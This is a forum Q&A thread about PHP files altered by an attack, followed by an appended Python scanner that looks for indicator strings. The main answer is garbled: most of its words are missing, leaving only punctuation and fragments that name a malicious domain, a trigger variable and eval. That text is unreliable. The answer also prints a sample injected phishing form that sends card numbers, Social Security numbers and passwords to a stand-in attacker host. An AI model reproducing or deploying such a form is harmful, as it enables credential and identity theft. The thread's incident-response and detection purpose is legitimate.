Hackers added content to my PHP files.

My site was taken over by hackers, and looking at the site, additional material has been added at the top of each PHP file.

Each file now starts with:

GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{

Full complement here

Everything seems to be fine in the database, so I'm wondering what is the likely login path for editing my files?

+5
3 answers

You are not the first to hit airschk

The exploit is based on a POST request with the variable prgetxr set.

(, , ), - IP mynetsxx, , IP , ( "", , , , , , ), , rewrioutclbkxxx. , GET, GET showmeallpls.

rewrioutclbkxxx , , , , , .

, , , , , .

hxxp://airschk.com/clk ( HTTP URL-), , , : user-agent (.. ), IP-, URL- , , 4dae82ac67843a194c000ca1, , , .

, , airschk . EVAL. , pwn'd.

EVAL , php. , , , . pwnt.

, , POST ? , , URL- toolbarqueries.google.com, URL- Google URL- (Blackhat SEO, Google , ).

, ,

  • airschk.
  • , , ( , )
  • google , Google.
  • - prgetxr GET- showmeallpls.

,

, IP-, , , . , , HTML:

<form method="post" action="./login.php">
    <input name="BankAccountNumber" />
    <input name="Password" />
</form>

, , , :

<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
    <input name="CreditCardNumber" />
    <input name="SocialSecurityNumber" />
    <input name="FullName" />
    <input name="DateOfBirth" />
    <input name="HomeAddress" />

    <input name="BankAccountNumber" />
    <input name="Password" />
    <input name="prgetxr" />
</form>

.

, , . .

? ? , -, , , , . Nuke .

chmod, -, , - . unix.

eval , ( suhosin). - , , . . .

, 12 , , , .

, , SO.

, -, .

. , , , .

+17
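
An added example, not part of the thread: a sweep of a web root for the header quoted in the question and the indicator strings named in the answer above. The optional opening tag before the header, the extension list and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Strings quoted in the thread; nothing else about the injected code is assumed.
INDICATORS = (b"wehaveitagain", b"prgetxr", b"showmeallpls", b"rewrioutclbkxxx", b"airschk")
# Header the question reports at the start of each file (opening tag optional: assumption).
HEADER_RE = re.compile(rb"\s*(?:<\?(?:php)?\s*)?global\s+\$wehaveitagain\s*;", re.IGNORECASE)
EXTENSIONS = {".php", ".inc", ".phtml"}  # assumed set of PHP-executed extensions


def scan_file(path):
    """Return (has_injected_header, indicators_found) for one file."""
    data = Path(path).read_bytes()
    lowered = data.lower()
    found = sorted(i.decode() for i in INDICATORS if i in lowered)
    return bool(HEADER_RE.match(data)), found


def scan_tree(root):
    """Return {relative_path: (has_header, indicators)} for every flagged file under root."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        try:
            header, found = scan_file(path)
        except OSError:
            continue  # unreadable file: keep sweeping instead of aborting
        if header or found:
            hits[path.relative_to(root).as_posix()] = (header, found)
    return hits


def demo():
    """Scan a constructed sample web root (all file contents below are made up)."""
    samples = {
        "index.php": b"<?php GLOBAL $wehaveitagain;\nif($wehaveitagain != 1)\n{\n}\necho 'home';\n",
        "clean.php": b"<?php echo 'ok';\n",
        "lib/form.php": b"<?php $v = $_POST['prgetxr'];\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, (header, found) in sorted(demo().items()):
        print(f"{rel}: injected_header={header} indicators={','.join(found)}")
```

A file flagged only by an indicator string, without the header, needs manual review before it is treated as modified.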
+1

Check the download part if your site can load. A hacker can download a script and modify your files.

0